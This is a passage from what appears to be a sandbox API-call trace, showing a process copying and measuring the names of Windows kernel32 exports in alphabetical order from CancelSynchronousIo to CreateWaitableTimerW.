lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0087.248] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0087.248] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0087.248] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0087.248] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0087.248] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0087.248] lstrlenA (lpString="CHECKELEVATION") returned 14 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0087.248] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0087.248] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0087.248] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0087.248] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0087.248] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0087.248] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0087.248] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0087.248] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0087.249] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0087.249] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0087.249] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0087.249] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0087.249] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0087.249] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0087.249] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0087.249] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0087.249] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0087.249] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0087.249] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0087.249] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0087.249] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0087.249] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0087.249] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0087.249] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0087.249] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0087.249] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0087.249] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0087.249] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0087.250] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0087.250] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0087.250] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0087.250] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0087.250] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0087.250] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0087.250] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0087.250] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0087.250] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0087.250] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0087.250] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0087.250] lstrlenA (lpString="COPYCONTEXT") returned 11 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0087.250] lstrlenA (lpString="COPYFILEA") returned 9 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0087.250] lstrlenA (lpString="COPYFILEEXA") returned 11 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0087.250] lstrlenA (lpString="COPYFILEEXW") returned 11 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0087.250] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0087.250] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0087.250] lstrlenA (lpString="COPYFILEW") returned 9 [0087.250] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0087.251] lstrlenA (lpString="COPYLZFILE") returned 10 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0087.251] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0087.251] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0087.251] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0087.251] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0087.251] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0087.251] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0087.251] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0087.251] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0087.251] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0087.251] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0087.251] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0087.251] lstrlenA (lpString="CREATEEVENTA") returned 12 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0087.251] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0087.251] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0087.251] lstrlenA (lpString="CREATEEVENTW") returned 12 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0087.251] lstrlenA (lpString="CREATEFIBER") returned 11 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0087.251] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0087.251] lstrlenA (lpString="CREATEFILEA") returned 11 [0087.251] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0087.252] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0087.252] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0087.252] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0087.252] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0087.252] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0087.252] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0087.252] lstrlenA (lpString="CREATEFILEW") returned 11 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0087.252] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0087.252] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0087.252] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0087.252] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0087.252] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0087.252] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0087.252] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0087.252] lstrlenA (lpString="CREATEJOBSET") returned 12 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0087.252] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0087.252] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0087.252] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0087.252] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0087.252] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0087.253] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0087.253] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0087.253] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0087.253] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0087.253] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0087.253] lstrlenA (lpString="CREATEPIPE") returned 10 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0087.253] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0087.253] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0087.253] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0087.253] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0087.253] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0087.253] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0087.253] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0087.253] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0087.253] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0087.253] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0087.253] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0087.253] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0087.253] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0087.253] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0087.254] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0087.254] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0087.254] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0087.255] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0087.255] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0087.255] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0087.255] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0087.255] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0087.255] lstrlenA (lpString="CREATETHREAD") returned 12 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0087.255] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0087.255] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0087.255] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0087.255] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0087.255] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0087.255] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0087.255] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0087.255] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0087.255] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0087.255] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0087.255] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0087.256] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0087.256] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0087.256] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0087.256] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" 